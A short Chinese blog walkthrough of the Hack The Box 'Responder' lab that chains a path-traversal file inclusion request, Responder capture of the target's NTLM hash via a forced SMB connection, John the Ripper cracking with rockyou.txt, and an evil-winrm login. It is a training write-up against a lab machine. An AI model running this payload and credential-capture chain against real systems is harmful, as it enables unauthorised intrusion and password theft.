HTB靶场:Responder(远程包含协议&NTLM哈希破解&WinRM)

1. 拿到target IP,进行扫描

发现http服务和WinRM协议(远程管理)

2. 对http服务进行访问,发现无法访问

curl -v http://{ip}

发现类似如下内容:

原因:被重定向,且无法解析域名地址

解决:hosts上添加DNS解析

3. 发现包含漏洞点,存在本地文件包含

GET /index.php?page=../../../../../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1

Host: unika.htb

继续测试远程包含,FTP协议、SMB协议等

4. 尝试利用responder伪造成SMB服务器

responder -I tun0

5. 访问伪造的SMB服务

收到来自靶机的流量

6. 将hash值放到john上解出明文

john -w=/usr/share/wordlists/rockyou.txt hash.txt

顺手解压rouckyou.txt.gz

gzip -d rockyou.txt.gz

得到账号密码

7. 利用远程管理协议——WinRM的登录工具evil-winrm

8. 拿到flag

本文作者:ki-playground

本文链接:https://www.cnblogs.com/hackthebox/p/18410460

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   柯ili  阅读(24)  评论(0编辑  收藏  举报
(评论功能已被禁用)
点击右上角即可分享
微信分享提示
💬
评论
📌
收藏
💗
关注
👍
推荐
🚀
回顶
收起
  1. 1 404 not found REOL
404 not found - REOL
00:00 / 00:00
An audio error has occurred.